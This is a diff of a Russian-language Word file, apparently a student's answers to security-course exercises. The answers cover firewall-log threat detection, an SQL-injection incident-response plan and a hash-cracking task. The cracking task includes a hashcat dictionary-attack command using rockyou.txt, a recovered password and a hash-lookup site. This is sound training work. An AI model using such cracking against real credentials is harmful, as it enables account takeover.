-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
@@ -10360,6 +9328,7 @@
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="a1">

--- a/1/answer.docx
+++ b/1/answer.docx
@@ -6191,13 +6191,56 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Это указывает на использование NTLM (первый хеш) и вероятно, что второй хеш является результатом применения к паролю какой-то соли или дополнительной обработки.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> указывает на использование </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>MD</w:t>
+      </w:r>
+      <w:r>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>NTLM (</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">командой </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>hash</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>identifier</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6244,20 +6287,486 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B65DEF8" wp14:editId="2077660C">
+            <wp:extent cx="3069011" cy="2156460"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1771233571" name="Рисунок 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1771233571" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3078694" cy="2163264"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BD43442" wp14:editId="52AF5437">
+            <wp:extent cx="3047323" cy="2141220"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+            <wp:docPr id="859438848" name="Рисунок 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="859438848" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3064054" cy="2152976"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>Hashcat</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">сообщает, что пустой пароль </w:t>
-      </w:r>
-    </w:p>
+        <w:t>сообщает</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>что</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>пустой</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>пароль</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>hashcat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 1400 -</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 0 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>hash</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>txt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rockyou</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>txt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">), </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03928165" wp14:editId="62F350B3">
+            <wp:extent cx="3185870" cy="2796540"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
+            <wp:docPr id="1995492606" name="Рисунок 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1995492606" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm flipH="1">
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3194134" cy="2803794"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="052BE102" wp14:editId="3A6DBCE4">
+            <wp:extent cx="2980330" cy="1676400"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="485660699" name="Рисунок 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="485660699" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3001339" cy="1688217"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">Файл </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rockyou</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>txt</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>на 133</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Mb</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">из </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Github</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">6_123  </w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>https</w:t>
+      </w:r>
+      <w:r>
+        <w:t>://</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>hashes</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>com</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>en</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>decrypt</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>hash</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="720" w:header="708" w:footer="708" w:gutter="0"/>
@@ -9376,6 +9885,36 @@
       <w:lang w:val="en"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="HTML">
+    <w:name w:val="HTML Preformatted"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="HTML0"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00302DDB"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="HTML0">
+    <w:name w:val="Стандартный HTML Знак"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="HTML"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00302DDB"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 

--- a/1/answer.docx
+++ b/1/answer.docx
@@ -24,7 +24,15 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Для эффективного использования журнала безопасности от межсетевого экрана (Firewall) между DMZ (Demilitarized Zone) и Интернетом для обнаружения угроз, необходимо следовать нескольким ключевым шагам:</w:t>
+        <w:t>Для эффективного использования журнала безопасности от межсетевого экрана (Firewall) между DMZ (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Demilitarized</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Zone) и Интернетом для обнаружения угроз, необходимо следовать нескольким ключевым шагам:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -42,10 +50,21 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Необычные паттерны трафика</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">(аномалии в объеме трафика, например, резкие всплески или падения) </w:t>
+        <w:t xml:space="preserve">Необычные паттерны </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>трафика</w:t>
+      </w:r>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">аномалии в объеме трафика, например, резкие всплески или падения) </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">и </w:t>
@@ -88,11 +107,19 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Ошибки и предупреждения</w:t>
+        <w:t xml:space="preserve">Ошибки и </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>предупреждения</w:t>
       </w:r>
       <w:r>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>ошибк</w:t>
       </w:r>
@@ -118,7 +145,15 @@
         <w:t>Проверка на наличие атак(</w:t>
       </w:r>
       <w:r>
-        <w:t>признаки попыток осуществления DDoS-атак, сканирования портов или попыток эксплуатации уязвимостей</w:t>
+        <w:t xml:space="preserve">признаки попыток осуществления </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>DDoS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-атак, сканирования портов или попыток эксплуатации уязвимостей</w:t>
       </w:r>
       <w:r>
         <w:t>)</w:t>
@@ -149,11 +184,19 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Идентификация известных вредоносных IP</w:t>
+        <w:t xml:space="preserve">Идентификация известных вредоносных </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>IP</w:t>
       </w:r>
       <w:r>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>Срав</w:t>
       </w:r>
@@ -217,14 +260,22 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Аномалии в доступе</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Аномалии в </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
+        <w:t>доступе</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>Обратите внимание на изменения в поведении пользователей, такие как доступ к ресурсам, которые обычно не запрашиваются</w:t>
       </w:r>
@@ -448,8 +499,13 @@
         </w:rPr>
         <w:t>Изучить оповещение</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Определить, какие именно правила IDS сработали и какие параметры вызвали тревогу.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Определить</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>, какие именно правила IDS сработали и какие параметры вызвали тревогу.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -465,8 +521,13 @@
         </w:rPr>
         <w:t>Логи системы</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Извлечь логи веб-сервера и базы данных за период, связанный с инцидентом. Это может включать доступ к страницам, ошибки, запросы к базе данных и т.д.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Извлечь</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> логи веб-сервера и базы данных за период, связанный с инцидентом. Это может включать доступ к страницам, ошибки, запросы к базе данных и т.д.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -506,8 +567,13 @@
         </w:rPr>
         <w:t>Идентификация подозрительных запросов</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Найти записи, содержащие подозрительные SQL-запросы или аномалии, такие как нестандартные параметры.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Найти</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> записи, содержащие подозрительные SQL-запросы или аномалии, такие как нестандартные параметры.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -523,8 +589,13 @@
         </w:rPr>
         <w:t>Проверка IP-адресов</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Просмотреть, откуда исходит трафик. Проверить, не является ли это известным вредоносным IP.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Просмотреть</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>, откуда исходит трафик. Проверить, не является ли это известным вредоносным IP.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -564,8 +635,13 @@
         </w:rPr>
         <w:t>Анализ кода приложения</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Определить, где в коде может происходить выполнение SQL-запросов. Ищите места, где не используются параметры для запросов или не проводится экранирование входных данных.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Определить</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>, где в коде может происходить выполнение SQL-запросов. Ищите места, где не используются параметры для запросов или не проводится экранирование входных данных.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -582,8 +658,21 @@
         </w:rPr>
         <w:t>Тестирование уязвимости</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Использовать инструменты для тестирования на уязвимости (например, SQLMap) в контролируемой среде, чтобы воспроизвести инъекцию и понять масштаб проблемы.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Использовать</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> инструменты для тестирования на уязвимости (например, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SQLMap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>) в контролируемой среде, чтобы воспроизвести инъекцию и понять масштаб проблемы.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -623,8 +712,13 @@
         </w:rPr>
         <w:t>Проверка базы данных</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Изучить, были ли выполнены вредоносные запросы, например, извлечение, изменение или удаление данных.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Изучить</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>, были ли выполнены вредоносные запросы, например, извлечение, изменение или удаление данных.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -640,8 +734,13 @@
         </w:rPr>
         <w:t>Мониторинг системы</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Убедиться, что нет дальнейших атак или признаков компрометации.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Убедиться</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>, что нет дальнейших атак или признаков компрометации.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -681,8 +780,29 @@
         </w:rPr>
         <w:t>Исправление уязвимостей</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Внедрить параметры для всех SQL-запросов, использовать ORM (Object-Relational Mapping), если это возможно.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Внедрить</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> параметры для всех SQL-запросов, использовать ORM (Object-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Relational</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Mapping</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>), если это возможно.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -698,8 +818,13 @@
         </w:rPr>
         <w:t>Обновление программного обеспечения</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Убедиться, что все компоненты системы обновлены до последних версий.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Убедиться</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>, что все компоненты системы обновлены до последних версий.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -715,8 +840,13 @@
         </w:rPr>
         <w:t>Настройка IDS/IPS</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Убедиться, что системы обнаружения и предотвращения вторжений настроены должным образом для выявления подобных атак в будущем.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Убедиться</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>, что системы обнаружения и предотвращения вторжений настроены должным образом для выявления подобных атак в будущем.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -760,8 +890,13 @@
         </w:rPr>
         <w:t>Составление отчета</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Подготовить отчет об инциденте, включив в него все шаги расследования, выявленные уязвимости и меры, принятые для устранения проблемы.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Подготовить</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
